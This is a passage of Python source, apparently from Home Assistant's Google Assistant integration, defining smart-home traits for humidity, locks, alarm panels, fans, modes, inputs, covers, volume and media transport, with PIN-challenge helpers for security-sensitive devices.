                    blocking=True,
                    context=data.context,
                )
                return

            if target_mode == "off":
                await self.hass.services.async_call(
                    climate.DOMAIN,
                    SERVICE_TURN_OFF,
                    {ATTR_ENTITY_ID: self.state.entity_id},
                    blocking=True,
                    context=data.context,
                )
                return

            if target_mode in self.google_to_preset:
                await self.hass.services.async_call(
                    climate.DOMAIN,
                    climate.SERVICE_SET_PRESET_MODE,
                    {
                        climate.ATTR_PRESET_MODE: self.google_to_preset[target_mode],
                        ATTR_ENTITY_ID: self.state.entity_id,
                    },
                    blocking=True,
                    context=data.context,
                )
                return

            await self.hass.services.async_call(
                climate.DOMAIN,
                climate.SERVICE_SET_HVAC_MODE,
                {
                    ATTR_ENTITY_ID: self.state.entity_id,
                    climate.ATTR_HVAC_MODE: self.google_to_hvac[target_mode],
                },
                blocking=True,
                context=data.context,
            )
@register_trait
class HumiditySettingTrait(_Trait):
    """Trait to offer humidity setting functionality.

    Humidifiers get a controllable setpoint; humidity sensors are query-only.
    https://developers.google.com/actions/smarthome/traits/humiditysetting
    """

    name = TRAIT_HUMIDITY_SETTING
    commands = [COMMAND_SET_HUMIDITY]

    @staticmethod
    def supported(domain, features, device_class, _):
        """Test if state is supported."""
        if domain == humidifier.DOMAIN:
            return True

        return domain == sensor.DOMAIN and device_class == sensor.DEVICE_CLASS_HUMIDITY

    def sync_attributes(self):
        """Return humidity attributes for a sync request."""
        response = {}
        attrs = self.state.attributes
        domain = self.state.domain

        if domain == sensor.DOMAIN:
            device_class = attrs.get(ATTR_DEVICE_CLASS)
            if device_class == sensor.DEVICE_CLASS_HUMIDITY:
                # Sensors can only report humidity, never change it.
                response["queryOnlyHumiditySetting"] = True

        elif domain == humidifier.DOMAIN:
            response["humiditySetpointRange"] = {
                "minPercent": round(
                    float(self.state.attributes[humidifier.ATTR_MIN_HUMIDITY])
                ),
                "maxPercent": round(
                    float(self.state.attributes[humidifier.ATTR_MAX_HUMIDITY])
                ),
            }

        return response

    def query_attributes(self):
        """Return humidity query attributes."""
        response = {}
        attrs = self.state.attributes
        domain = self.state.domain

        if domain == sensor.DOMAIN:
            device_class = attrs.get(ATTR_DEVICE_CLASS)
            if device_class == sensor.DEVICE_CLASS_HUMIDITY:
                current_humidity = self.state.state
                if current_humidity not in (STATE_UNKNOWN, STATE_UNAVAILABLE):
                    response["humidityAmbientPercent"] = round(float(current_humidity))

        elif domain == humidifier.DOMAIN:
            target_humidity = attrs.get(humidifier.ATTR_HUMIDITY)
            if target_humidity is not None:
                response["humiditySetpointPercent"] = round(float(target_humidity))

        return response

    async def execute(self, command, data, params, challenge):
        """Execute a humidity command."""
        domain = self.state.domain

        if domain == sensor.DOMAIN:
            raise SmartHomeError(
                ERR_NOT_SUPPORTED, "Execute is not supported by sensor"
            )

        if command == COMMAND_SET_HUMIDITY:
            await self.hass.services.async_call(
                humidifier.DOMAIN,
                humidifier.SERVICE_SET_HUMIDITY,
                {
                    ATTR_ENTITY_ID: self.state.entity_id,
                    humidifier.ATTR_HUMIDITY: params["humidity"],
                },
                blocking=True,
                context=data.context,
            )
@register_trait
class LockUnlockTrait(_Trait):
    """Trait to lock or unlock a lock.

    https://developers.google.com/actions/smarthome/traits/lockunlock
    """

    name = TRAIT_LOCKUNLOCK
    commands = [COMMAND_LOCKUNLOCK]

    @staticmethod
    def supported(domain, features, device_class, _):
        """Test if state is supported."""
        return domain == lock.DOMAIN

    @staticmethod
    def might_2fa(domain, features, device_class):
        """Return if the trait might ask for 2FA."""
        return True

    def sync_attributes(self):
        """Return LockUnlock attributes for a sync request."""
        return {}

    def query_attributes(self):
        """Return LockUnlock query attributes."""
        state = self.state.state
        if state == STATE_JAMMED:
            return {"isJammed": True}
        # A lock that is still unlocking has not opened yet, so treat it
        # as locked.
        return {"isLocked": state in (STATE_UNLOCKING, STATE_LOCKED)}

    async def execute(self, command, data, params, challenge):
        """Execute an LockUnlock command."""
        if params["lock"]:
            service = lock.SERVICE_LOCK
        else:
            # Unlocking is security sensitive, so enforce the PIN challenge.
            _verify_pin_challenge(data, self.state, challenge)
            service = lock.SERVICE_UNLOCK

        await self.hass.services.async_call(
            lock.DOMAIN,
            service,
            {ATTR_ENTITY_ID: self.state.entity_id},
            blocking=True,
            context=data.context,
        )
@register_trait
class ArmDisArmTrait(_Trait):
    """Trait to Arm or Disarm a Security System.

    https://developers.google.com/actions/smarthome/traits/armdisarm
    """

    name = TRAIT_ARMDISARM
    commands = [COMMAND_ARMDISARM]

    # Maps each armed/triggered alarm state to the service that produces it.
    state_to_service = {
        STATE_ALARM_ARMED_HOME: SERVICE_ALARM_ARM_HOME,
        STATE_ALARM_ARMED_AWAY: SERVICE_ALARM_ARM_AWAY,
        STATE_ALARM_ARMED_NIGHT: SERVICE_ALARM_ARM_NIGHT,
        STATE_ALARM_ARMED_CUSTOM_BYPASS: SERVICE_ALARM_ARM_CUSTOM_BYPASS,
        STATE_ALARM_TRIGGERED: SERVICE_ALARM_TRIGGER,
    }

    # Maps each alarm state to the panel feature flag that must be set for
    # that state to be offered as an available arm level.
    state_to_support = {
        STATE_ALARM_ARMED_HOME: alarm_control_panel.const.SUPPORT_ALARM_ARM_HOME,
        STATE_ALARM_ARMED_AWAY: alarm_control_panel.const.SUPPORT_ALARM_ARM_AWAY,
        STATE_ALARM_ARMED_NIGHT: alarm_control_panel.const.SUPPORT_ALARM_ARM_NIGHT,
        STATE_ALARM_ARMED_CUSTOM_BYPASS: alarm_control_panel.const.SUPPORT_ALARM_ARM_CUSTOM_BYPASS,
        STATE_ALARM_TRIGGERED: alarm_control_panel.const.SUPPORT_ALARM_TRIGGER,
    }

    @staticmethod
    def supported(domain, features, device_class, _):
        """Test if state is supported."""
        return domain == alarm_control_panel.DOMAIN

    @staticmethod
    def might_2fa(domain, features, device_class):
        """Return if the trait might ask for 2FA."""
        return True

    def _supported_states(self):
        """Return the alarm states this panel's feature flags allow."""
        features = self.state.attributes.get(ATTR_SUPPORTED_FEATURES, 0)

        return [
            state
            for state, required_feature in self.state_to_support.items()
            if features & required_feature != 0
        ]

    def sync_attributes(self):
        """Return ArmDisarm attributes for a sync request."""
        response = {}
        levels = []
        for state in self._supported_states():
            # level synonyms are generated from state names
            # 'armed_away' becomes 'armed away' or 'away'
            level_synonym = [state.replace("_", " ")]
            if state != STATE_ALARM_TRIGGERED:
                level_synonym.append(state.split("_")[1])

            level = {
                "level_name": state,
                "level_values": [{"level_synonym": level_synonym, "lang": "en"}],
            }
            levels.append(level)

        response["availableArmLevels"] = {"levels": levels, "ordered": False}
        return response

    def query_attributes(self):
        """Return ArmDisarm query attributes."""
        # "next_state" is present while the panel is transitioning (e.g. exit
        # delay); report the state being transitioned into.
        if "next_state" in self.state.attributes:
            armed_state = self.state.attributes["next_state"]
        else:
            armed_state = self.state.state

        response = {"isArmed": armed_state in self.state_to_service}
        if response["isArmed"]:
            response.update({"currentArmLevel": armed_state})

        return response

    async def execute(self, command, data, params, challenge):
        """Execute an ArmDisarm command."""
        if params["arm"] and not params.get("cancel"):
            # If no arm level given, we can only arm it if there is
            # only one supported arm type. We never default to triggered.
            if not (arm_level := params.get("armLevel")):
                states = self._supported_states()

                if STATE_ALARM_TRIGGERED in states:
                    states.remove(STATE_ALARM_TRIGGERED)

                if len(states) != 1:
                    raise SmartHomeError(ERR_NOT_SUPPORTED, "ArmLevel missing")

                arm_level = states[0]

            if self.state.state == arm_level:
                raise SmartHomeError(ERR_ALREADY_ARMED, "System is already armed")

            # Only challenge for the PIN when the panel itself requires a
            # code to arm.
            if self.state.attributes["code_arm_required"]:
                _verify_pin_challenge(data, self.state, challenge)

            service = self.state_to_service[arm_level]
        # disarm the system without asking for code when
        # 'cancel' arming action is received while current status is pending
        elif (
            params["arm"]
            and params.get("cancel")
            and self.state.state == STATE_ALARM_PENDING
        ):
            service = SERVICE_ALARM_DISARM
        else:
            if self.state.state == STATE_ALARM_DISARMED:
                raise SmartHomeError(ERR_ALREADY_DISARMED, "System is already disarmed")

            # Disarming always requires the PIN challenge (when 2FA applies).
            _verify_pin_challenge(data, self.state, challenge)
            service = SERVICE_ALARM_DISARM

        await self.hass.services.async_call(
            alarm_control_panel.DOMAIN,
            service,
            {
                ATTR_ENTITY_ID: self.state.entity_id,
                ATTR_CODE: data.config.secure_devices_pin,
            },
            blocking=True,
            context=data.context,
        )
@register_trait
class FanSpeedTrait(_Trait):
    """Trait to control speed of Fan.

    https://developers.google.com/actions/smarthome/traits/fanspeed
    """

    name = TRAIT_FANSPEED
    commands = [COMMAND_FANSPEED, COMMAND_REVERSE]

    @staticmethod
    def supported(domain, features, device_class, _):
        """Test if state is supported."""
        required_flag = {
            fan.DOMAIN: fan.SUPPORT_SET_SPEED,
            climate.DOMAIN: climate.SUPPORT_FAN_MODE,
        }.get(domain)
        if required_flag is None:
            return False
        return features & required_flag

    def sync_attributes(self):
        """Return speed point and modes attributes for a sync request."""
        domain = self.state.domain
        attrs = self.state.attributes
        result = {}

        if domain == fan.DOMAIN:
            # Fans report speed as a percentage; direction support decides
            # whether the Reverse command is advertised.
            supports_direction = bool(
                attrs.get(ATTR_SUPPORTED_FEATURES, 0) & fan.SUPPORT_DIRECTION
            )
            result["reversible"] = supports_direction
            result["supportsFanSpeedPercent"] = True
        elif domain == climate.DOMAIN:
            # Climate devices expose their discrete fan modes as named speeds.
            available = [
                {
                    "speed_name": mode,
                    "speed_values": [{"speed_synonym": [mode], "lang": "en"}],
                }
                for mode in (attrs.get(climate.ATTR_FAN_MODES) or [])
            ]
            result["reversible"] = False
            result["availableFanSpeeds"] = {"speeds": available, "ordered": True}

        return result

    def query_attributes(self):
        """Return speed point and modes query attributes."""
        attrs = self.state.attributes
        domain = self.state.domain
        response = {}

        if domain == climate.DOMAIN:
            response["currentFanSpeedSetting"] = (
                attrs.get(climate.ATTR_FAN_MODE) or "off"
            )
        if domain == fan.DOMAIN:
            response["currentFanSpeedPercent"] = attrs.get(fan.ATTR_PERCENTAGE) or 0

        return response

    async def execute_fanspeed(self, data, params):
        """Execute an SetFanSpeed command."""
        domain = self.state.domain

        if domain == climate.DOMAIN:
            service = climate.SERVICE_SET_FAN_MODE
            service_data = {
                ATTR_ENTITY_ID: self.state.entity_id,
                climate.ATTR_FAN_MODE: params["fanSpeed"],
            }
        elif domain == fan.DOMAIN:
            service = fan.SERVICE_SET_PERCENTAGE
            service_data = {
                ATTR_ENTITY_ID: self.state.entity_id,
                fan.ATTR_PERCENTAGE: params["fanSpeedPercent"],
            }
        else:
            return

        await self.hass.services.async_call(
            domain, service, service_data, blocking=True, context=data.context
        )

    async def execute_reverse(self, data, params):
        """Execute a Reverse command."""
        if self.state.domain != fan.DOMAIN:
            return

        # Toggle between the two directions.
        current = self.state.attributes.get(fan.ATTR_DIRECTION)
        new_direction = (
            fan.DIRECTION_REVERSE
            if current == fan.DIRECTION_FORWARD
            else fan.DIRECTION_FORWARD
        )

        await self.hass.services.async_call(
            fan.DOMAIN,
            fan.SERVICE_SET_DIRECTION,
            {
                ATTR_ENTITY_ID: self.state.entity_id,
                fan.ATTR_DIRECTION: new_direction,
            },
            blocking=True,
            context=data.context,
        )

    async def execute(self, command, data, params, challenge):
        """Execute a smart home command."""
        if command == COMMAND_FANSPEED:
            await self.execute_fanspeed(data, params)
        elif command == COMMAND_REVERSE:
            await self.execute_reverse(data, params)
@register_trait
class ModesTrait(_Trait):
    """Trait to set modes.

    https://developers.google.com/actions/smarthome/traits/modes
    """

    name = TRAIT_MODES
    commands = [COMMAND_MODES]

    # Extra spoken synonyms for the generated mode/setting names.
    SYNONYMS = {
        "preset mode": ["preset mode", "mode", "preset"],
        "sound mode": ["sound mode", "effects"],
        "option": ["option", "setting", "mode", "value"],
    }

    @staticmethod
    def supported(domain, features, device_class, _):
        """Test if state is supported."""
        if domain == fan.DOMAIN and features & fan.SUPPORT_PRESET_MODE:
            return True

        if domain == input_select.DOMAIN:
            return True

        if domain == select.DOMAIN:
            return True

        if domain == humidifier.DOMAIN and features & humidifier.SUPPORT_MODES:
            return True

        if domain == light.DOMAIN and features & light.SUPPORT_EFFECT:
            return True

        if domain != media_player.DOMAIN:
            return False

        return features & media_player.SUPPORT_SELECT_SOUND_MODE

    def _generate(self, name, settings):
        """Generate a single Google "mode" descriptor from a list of settings."""
        mode = {
            "name": name,
            "name_values": [
                {"name_synonym": self.SYNONYMS.get(name, [name]), "lang": "en"}
            ],
            "settings": [],
            "ordered": False,
        }
        for setting in settings:
            mode["settings"].append(
                {
                    "setting_name": setting,
                    "setting_values": [
                        {
                            "setting_synonym": self.SYNONYMS.get(setting, [setting]),
                            "lang": "en",
                        }
                    ],
                }
            )
        return mode

    def sync_attributes(self):
        """Return mode attributes for a sync request."""
        modes = []
        # (domain, attribute holding the setting list, Google mode name)
        for domain, attr, name in (
            (fan.DOMAIN, fan.ATTR_PRESET_MODES, "preset mode"),
            (media_player.DOMAIN, media_player.ATTR_SOUND_MODE_LIST, "sound mode"),
            (input_select.DOMAIN, input_select.ATTR_OPTIONS, "option"),
            (select.DOMAIN, select.ATTR_OPTIONS, "option"),
            (humidifier.DOMAIN, humidifier.ATTR_AVAILABLE_MODES, "mode"),
            (light.DOMAIN, light.ATTR_EFFECT_LIST, "effect"),
        ):
            if self.state.domain != domain:
                continue

            if (items := self.state.attributes.get(attr)) is not None:
                modes.append(self._generate(name, items))

            # Shortcut since all domains are currently unique
            break

        payload = {"availableModes": modes}

        return payload

    def query_attributes(self):
        """Return current modes."""
        attrs = self.state.attributes
        response = {}
        mode_settings = {}

        if self.state.domain == fan.DOMAIN:
            if fan.ATTR_PRESET_MODES in attrs:
                mode_settings["preset mode"] = attrs.get(fan.ATTR_PRESET_MODE)
        elif self.state.domain == media_player.DOMAIN:
            if media_player.ATTR_SOUND_MODE_LIST in attrs:
                mode_settings["sound mode"] = attrs.get(media_player.ATTR_SOUND_MODE)
        elif self.state.domain == input_select.DOMAIN:
            # For (input_)select the entity state itself is the chosen option.
            mode_settings["option"] = self.state.state
        elif self.state.domain == select.DOMAIN:
            mode_settings["option"] = self.state.state
        elif self.state.domain == humidifier.DOMAIN:
            if ATTR_MODE in attrs:
                mode_settings["mode"] = attrs.get(ATTR_MODE)
        elif self.state.domain == light.DOMAIN and light.ATTR_EFFECT in attrs:
            mode_settings["effect"] = attrs.get(light.ATTR_EFFECT)

        if mode_settings:
            response["on"] = self.state.state not in (STATE_OFF, STATE_UNKNOWN)
            response["currentModeSettings"] = mode_settings

        return response

    async def execute(self, command, data, params, challenge):
        """Execute a SetModes command."""
        settings = params.get("updateModeSettings")

        if self.state.domain == fan.DOMAIN:
            preset_mode = settings["preset mode"]
            await self.hass.services.async_call(
                fan.DOMAIN,
                fan.SERVICE_SET_PRESET_MODE,
                {
                    ATTR_ENTITY_ID: self.state.entity_id,
                    fan.ATTR_PRESET_MODE: preset_mode,
                },
                blocking=True,
                context=data.context,
            )
            return

        if self.state.domain == input_select.DOMAIN:
            option = settings["option"]
            await self.hass.services.async_call(
                input_select.DOMAIN,
                input_select.SERVICE_SELECT_OPTION,
                {
                    ATTR_ENTITY_ID: self.state.entity_id,
                    input_select.ATTR_OPTION: option,
                },
                blocking=True,
                context=data.context,
            )
            return

        if self.state.domain == select.DOMAIN:
            option = settings["option"]
            await self.hass.services.async_call(
                select.DOMAIN,
                select.SERVICE_SELECT_OPTION,
                {
                    ATTR_ENTITY_ID: self.state.entity_id,
                    select.ATTR_OPTION: option,
                },
                blocking=True,
                context=data.context,
            )
            return

        if self.state.domain == humidifier.DOMAIN:
            requested_mode = settings["mode"]
            await self.hass.services.async_call(
                humidifier.DOMAIN,
                humidifier.SERVICE_SET_MODE,
                {
                    ATTR_MODE: requested_mode,
                    ATTR_ENTITY_ID: self.state.entity_id,
                },
                blocking=True,
                context=data.context,
            )
            return

        if self.state.domain == light.DOMAIN:
            # Light "effect" is applied through turn_on with the effect attr.
            requested_effect = settings["effect"]
            await self.hass.services.async_call(
                light.DOMAIN,
                SERVICE_TURN_ON,
                {
                    ATTR_ENTITY_ID: self.state.entity_id,
                    light.ATTR_EFFECT: requested_effect,
                },
                blocking=True,
                context=data.context,
            )
            return

        if self.state.domain == media_player.DOMAIN and (
            sound_mode := settings.get("sound mode")
        ):
            await self.hass.services.async_call(
                media_player.DOMAIN,
                media_player.SERVICE_SELECT_SOUND_MODE,
                {
                    ATTR_ENTITY_ID: self.state.entity_id,
                    media_player.ATTR_SOUND_MODE: sound_mode,
                },
                blocking=True,
                context=data.context,
            )

        # NOTE(review): this log also runs after a successful sound-mode call
        # above, since that branch does not return before reaching here —
        # confirm whether an early return was intended.
        _LOGGER.info(
            "Received an Options command for unrecognised domain %s",
            self.state.domain,
        )
        return
@register_trait
class InputSelectorTrait(_Trait):
    """Trait to set modes.

    https://developers.google.com/assistant/smarthome/traits/inputselector
    """

    name = TRAIT_INPUTSELECTOR
    commands = [COMMAND_INPUT, COMMAND_NEXT_INPUT, COMMAND_PREVIOUS_INPUT]

    SYNONYMS = {}

    @staticmethod
    def supported(domain, features, device_class, _):
        """Test if state is supported."""
        return bool(
            domain == media_player.DOMAIN
            and features & media_player.SUPPORT_SELECT_SOURCE
        )

    def sync_attributes(self):
        """Return mode attributes for a sync request."""
        source_list = self.state.attributes.get(
            media_player.ATTR_INPUT_SOURCE_LIST, []
        )
        available = []
        for source in source_list:
            available.append(
                {"key": source, "names": [{"name_synonym": [source], "lang": "en"}]}
            )
        return {"availableInputs": available, "orderedInputs": True}

    def query_attributes(self):
        """Return current modes."""
        current = self.state.attributes.get(media_player.ATTR_INPUT_SOURCE, "")
        return {"currentInput": current}

    async def execute(self, command, data, params, challenge):
        """Execute an SetInputSource command."""
        attrs = self.state.attributes
        sources = attrs.get(media_player.ATTR_INPUT_SOURCE_LIST) or []
        current = attrs.get(media_player.ATTR_INPUT_SOURCE)

        if command == COMMAND_INPUT:
            requested = params.get("newInput")
        elif command == COMMAND_NEXT_INPUT:
            requested = _next_selected(sources, current)
        elif command == COMMAND_PREVIOUS_INPUT:
            # Previous input == next input over the reversed source list.
            requested = _next_selected(list(reversed(sources)), current)
        else:
            raise SmartHomeError(ERR_NOT_SUPPORTED, "Unsupported command")

        if requested not in sources:
            raise SmartHomeError(ERR_UNSUPPORTED_INPUT, "Unsupported input")

        await self.hass.services.async_call(
            media_player.DOMAIN,
            media_player.SERVICE_SELECT_SOURCE,
            {
                ATTR_ENTITY_ID: self.state.entity_id,
                media_player.ATTR_INPUT_SOURCE: requested,
            },
            blocking=True,
            context=data.context,
        )
@register_trait
class OpenCloseTrait(_Trait):
    """Trait to open and close a cover.

    https://developers.google.com/actions/smarthome/traits/openclose
    """

    # Cover device classes that require 2FA
    COVER_2FA = (
        cover.DEVICE_CLASS_DOOR,
        cover.DEVICE_CLASS_GARAGE,
        cover.DEVICE_CLASS_GATE,
    )

    name = TRAIT_OPENCLOSE
    commands = [COMMAND_OPENCLOSE, COMMAND_OPENCLOSE_RELATIVE]

    @staticmethod
    def supported(domain, features, device_class, _):
        """Test if state is supported."""
        if domain == cover.DOMAIN:
            return True

        # Door/window style binary sensors are exposed as query-only
        # open/close devices.
        return domain == binary_sensor.DOMAIN and device_class in (
            binary_sensor.DEVICE_CLASS_DOOR,
            binary_sensor.DEVICE_CLASS_GARAGE_DOOR,
            binary_sensor.DEVICE_CLASS_LOCK,
            binary_sensor.DEVICE_CLASS_OPENING,
            binary_sensor.DEVICE_CLASS_WINDOW,
        )

    @staticmethod
    def might_2fa(domain, features, device_class):
        """Return if the trait might ask for 2FA."""
        return domain == cover.DOMAIN and device_class in OpenCloseTrait.COVER_2FA

    def sync_attributes(self):
        """Return opening direction."""
        response = {}
        features = self.state.attributes.get(ATTR_SUPPORTED_FEATURES, 0)

        if self.state.domain == binary_sensor.DOMAIN:
            # Binary sensors cannot be commanded and only know open/closed.
            response["queryOnlyOpenClose"] = True
            response["discreteOnlyOpenClose"] = True
        elif (
            self.state.domain == cover.DOMAIN
            and features & cover.SUPPORT_SET_POSITION == 0
        ):
            # Without SET_POSITION the cover is all-or-nothing.
            response["discreteOnlyOpenClose"] = True

            if (
                features & cover.SUPPORT_OPEN == 0
                and features & cover.SUPPORT_CLOSE == 0
            ):
                response["queryOnlyOpenClose"] = True

        if self.state.attributes.get(ATTR_ASSUMED_STATE):
            response["commandOnlyOpenClose"] = True

        return response

    def query_attributes(self):
        """Return state query attributes."""
        domain = self.state.domain
        response = {}

        # When it's an assumed state, we will return empty state
        # This shouldn't happen because we set `commandOnlyOpenClose`
        # but Google still queries. Erroring here will cause device
        # to show up offline.
        if self.state.attributes.get(ATTR_ASSUMED_STATE):
            return response

        if domain == cover.DOMAIN:
            if self.state.state == STATE_UNKNOWN:
                raise SmartHomeError(
                    ERR_NOT_SUPPORTED, "Querying state is not supported"
                )

            position = self.state.attributes.get(cover.ATTR_CURRENT_POSITION)

            if position is not None:
                response["openPercent"] = position
            elif self.state.state != cover.STATE_CLOSED:
                # No position reporting: treat anything not closed as open.
                response["openPercent"] = 100
            else:
                response["openPercent"] = 0

        elif domain == binary_sensor.DOMAIN:
            if self.state.state == STATE_ON:
                response["openPercent"] = 100
            else:
                response["openPercent"] = 0

        return response

    async def execute(self, command, data, params, challenge):
        """Execute an Open, close, Set position command."""
        domain = self.state.domain
        features = self.state.attributes.get(ATTR_SUPPORTED_FEATURES, 0)

        if domain == cover.DOMAIN:
            svc_params = {ATTR_ENTITY_ID: self.state.entity_id}
            should_verify = False
            if command == COMMAND_OPENCLOSE_RELATIVE:
                position = self.state.attributes.get(cover.ATTR_CURRENT_POSITION)
                if position is None:
                    raise SmartHomeError(
                        ERR_NOT_SUPPORTED,
                        "Current position not know for relative command",
                    )
                # Clamp the adjusted position to the valid 0-100 range.
                position = max(0, min(100, position + params["openRelativePercent"]))
            else:
                position = params["openPercent"]

            if position == 0:
                service = cover.SERVICE_CLOSE_COVER
                should_verify = False
            elif position == 100:
                service = cover.SERVICE_OPEN_COVER
                should_verify = True
            elif features & cover.SUPPORT_SET_POSITION:
                service = cover.SERVICE_SET_COVER_POSITION
                if position > 0:
                    should_verify = True
                svc_params[cover.ATTR_POSITION] = position
            else:
                raise SmartHomeError(
                    ERR_NOT_SUPPORTED, "No support for partial open close"
                )

            # Opening (fully or partially) a secure cover class requires the
            # user's PIN; closing never does.
            if (
                should_verify
                and self.state.attributes.get(ATTR_DEVICE_CLASS)
                in OpenCloseTrait.COVER_2FA
            ):
                _verify_pin_challenge(data, self.state, challenge)

            await self.hass.services.async_call(
                cover.DOMAIN, service, svc_params, blocking=True, context=data.context
            )
@register_trait
class VolumeTrait(_Trait):
    """Trait to control volume of a device.

    https://developers.google.com/actions/smarthome/traits/volume
    """

    name = TRAIT_VOLUME
    commands = [COMMAND_SET_VOLUME, COMMAND_VOLUME_RELATIVE, COMMAND_MUTE]

    @staticmethod
    def supported(domain, features, device_class, _):
        """Test if trait is supported."""
        if domain == media_player.DOMAIN:
            return features & (
                media_player.SUPPORT_VOLUME_SET | media_player.SUPPORT_VOLUME_STEP
            )

        return False

    def sync_attributes(self):
        """Return volume attributes for a sync request."""
        features = self.state.attributes.get(ATTR_SUPPORTED_FEATURES, 0)
        return {
            "volumeCanMuteAndUnmute": bool(features & media_player.SUPPORT_VOLUME_MUTE),
            "commandOnlyVolume": self.state.attributes.get(ATTR_ASSUMED_STATE, False),
            # Volume amounts in SET_VOLUME and VOLUME_RELATIVE are on a scale
            # from 0 to this value.
            "volumeMaxLevel": 100,
            # Default change for queries like "Hey Google, volume up".
            # 10% corresponds to the default behavior for the
            # media_player.volume{up,down} services.
            "levelStepSize": 10,
        }

    def query_attributes(self):
        """Return volume query attributes."""
        response = {}

        level = self.state.attributes.get(media_player.ATTR_MEDIA_VOLUME_LEVEL)
        if level is not None:
            # Convert 0.0-1.0 to 0-100
            response["currentVolume"] = int(level * 100)

        muted = self.state.attributes.get(media_player.ATTR_MEDIA_VOLUME_MUTED)
        if muted is not None:
            response["isMuted"] = bool(muted)

        return response

    async def _set_volume_absolute(self, data, level):
        """Call volume_set with *level* on the 0.0-1.0 scale."""
        await self.hass.services.async_call(
            media_player.DOMAIN,
            media_player.SERVICE_VOLUME_SET,
            {
                ATTR_ENTITY_ID: self.state.entity_id,
                media_player.ATTR_MEDIA_VOLUME_LEVEL: level,
            },
            blocking=True,
            context=data.context,
        )

    async def _execute_set_volume(self, data, params):
        """Handle an absolute SetVolume command (0-100 scale)."""
        level = max(0, min(100, params["volumeLevel"]))

        if not (
            self.state.attributes.get(ATTR_SUPPORTED_FEATURES, 0)
            & media_player.SUPPORT_VOLUME_SET
        ):
            raise SmartHomeError(ERR_NOT_SUPPORTED, "Command not supported")

        await self._set_volume_absolute(data, level / 100)

    async def _execute_volume_relative(self, data, params):
        """Handle a volumeRelative command (signed step count)."""
        relative = params["relativeSteps"]
        features = self.state.attributes.get(ATTR_SUPPORTED_FEATURES, 0)

        if features & media_player.SUPPORT_VOLUME_SET:
            current = self.state.attributes.get(media_player.ATTR_MEDIA_VOLUME_LEVEL)
            if current is None:
                # Fix: the current volume level can be unknown (attribute
                # absent); previously this crashed with a TypeError on the
                # addition below. Report "not supported" instead.
                raise SmartHomeError(ERR_NOT_SUPPORTED, "Command not supported")
            target = max(0.0, min(1.0, current + relative / 100))

            await self._set_volume_absolute(data, target)

        elif features & media_player.SUPPORT_VOLUME_STEP:
            # No absolute set support: emit one volume_up/volume_down call
            # per requested step.
            svc = media_player.SERVICE_VOLUME_UP
            if relative < 0:
                svc = media_player.SERVICE_VOLUME_DOWN
                relative = -relative

            for _ in range(relative):
                await self.hass.services.async_call(
                    media_player.DOMAIN,
                    svc,
                    {ATTR_ENTITY_ID: self.state.entity_id},
                    blocking=True,
                    context=data.context,
                )
        else:
            raise SmartHomeError(ERR_NOT_SUPPORTED, "Command not supported")

    async def _execute_mute(self, data, params):
        """Handle a mute/unmute command."""
        mute = params["mute"]

        if not (
            self.state.attributes.get(ATTR_SUPPORTED_FEATURES, 0)
            & media_player.SUPPORT_VOLUME_MUTE
        ):
            raise SmartHomeError(ERR_NOT_SUPPORTED, "Command not supported")

        await self.hass.services.async_call(
            media_player.DOMAIN,
            media_player.SERVICE_VOLUME_MUTE,
            {
                ATTR_ENTITY_ID: self.state.entity_id,
                media_player.ATTR_MEDIA_VOLUME_MUTED: mute,
            },
            blocking=True,
            context=data.context,
        )

    async def execute(self, command, data, params, challenge):
        """Execute a volume command."""
        if command == COMMAND_SET_VOLUME:
            await self._execute_set_volume(data, params)
        elif command == COMMAND_VOLUME_RELATIVE:
            await self._execute_volume_relative(data, params)
        elif command == COMMAND_MUTE:
            await self._execute_mute(data, params)
        else:
            raise SmartHomeError(ERR_NOT_SUPPORTED, "Command not supported")
def _verify_pin_challenge(data, state, challenge):
    """Verify a pin challenge."""
    # Devices not configured for 2FA pass without any challenge.
    if not data.config.should_2fa(state):
        return

    pin = data.config.secure_devices_pin
    if not pin:
        raise SmartHomeError(ERR_CHALLENGE_NOT_SETUP, "Challenge is not set up")

    if not challenge:
        raise ChallengeNeeded(CHALLENGE_PIN_NEEDED)

    if challenge.get("pin") != pin:
        raise ChallengeNeeded(CHALLENGE_FAILED_PIN_NEEDED)
def _verify_ack_challenge(data, state, challenge):
    """Verify an ack challenge."""
    # Devices not configured for 2FA pass without any challenge.
    if not data.config.should_2fa(state):
        return

    acknowledged = bool(challenge) and challenge.get("ack")
    if not acknowledged:
        raise ChallengeNeeded(CHALLENGE_ACK_NEEDED)
# Feature flag a media_player must expose for each transport command.
MEDIA_COMMAND_SUPPORT_MAPPING = {
    COMMAND_MEDIA_NEXT: media_player.SUPPORT_NEXT_TRACK,
    COMMAND_MEDIA_PAUSE: media_player.SUPPORT_PAUSE,
    COMMAND_MEDIA_PREVIOUS: media_player.SUPPORT_PREVIOUS_TRACK,
    COMMAND_MEDIA_RESUME: media_player.SUPPORT_PLAY,
    COMMAND_MEDIA_SEEK_RELATIVE: media_player.SUPPORT_SEEK,
    COMMAND_MEDIA_SEEK_TO_POSITION: media_player.SUPPORT_SEEK,
    COMMAND_MEDIA_SHUFFLE: media_player.SUPPORT_SHUFFLE_SET,
    COMMAND_MEDIA_STOP: media_player.SUPPORT_STOP,
}
# Google `transportControlSupportedCommands` name for each command.
MEDIA_COMMAND_ATTRIBUTES = {
    COMMAND_MEDIA_NEXT: "NEXT",
    COMMAND_MEDIA_PAUSE: "PAUSE",
    COMMAND_MEDIA_PREVIOUS: "PREVIOUS",
    COMMAND_MEDIA_RESUME: "RESUME",
    COMMAND_MEDIA_SEEK_RELATIVE: "SEEK_RELATIVE",
    COMMAND_MEDIA_SEEK_TO_POSITION: "SEEK_TO_POSITION",
    COMMAND_MEDIA_SHUFFLE: "SHUFFLE",
    COMMAND_MEDIA_STOP: "STOP",
}
@register_trait
class TransportControlTrait(_Trait):
    """Trait to control media playback.

    https://developers.google.com/actions/smarthome/traits/transportcontrol
    """

    name = TRAIT_TRANSPORT_CONTROL
    commands = [
        COMMAND_MEDIA_NEXT,
        COMMAND_MEDIA_PAUSE,
        COMMAND_MEDIA_PREVIOUS,
        COMMAND_MEDIA_RESUME,
        COMMAND_MEDIA_SEEK_RELATIVE,
        COMMAND_MEDIA_SEEK_TO_POSITION,
        COMMAND_MEDIA_SHUFFLE,
        COMMAND_MEDIA_STOP,
    ]

    @staticmethod
    def supported(domain, features, device_class, _):
        """Test if state is supported."""
        if domain == media_player.DOMAIN:
            # Supported when the player exposes at least one mapped feature.
            for feature in MEDIA_COMMAND_SUPPORT_MAPPING.values():
                if features & feature:
                    return True

        return False

    def sync_attributes(self):
        """Return transport control attributes for a sync request."""
        response = {}

        if self.state.domain == media_player.DOMAIN:
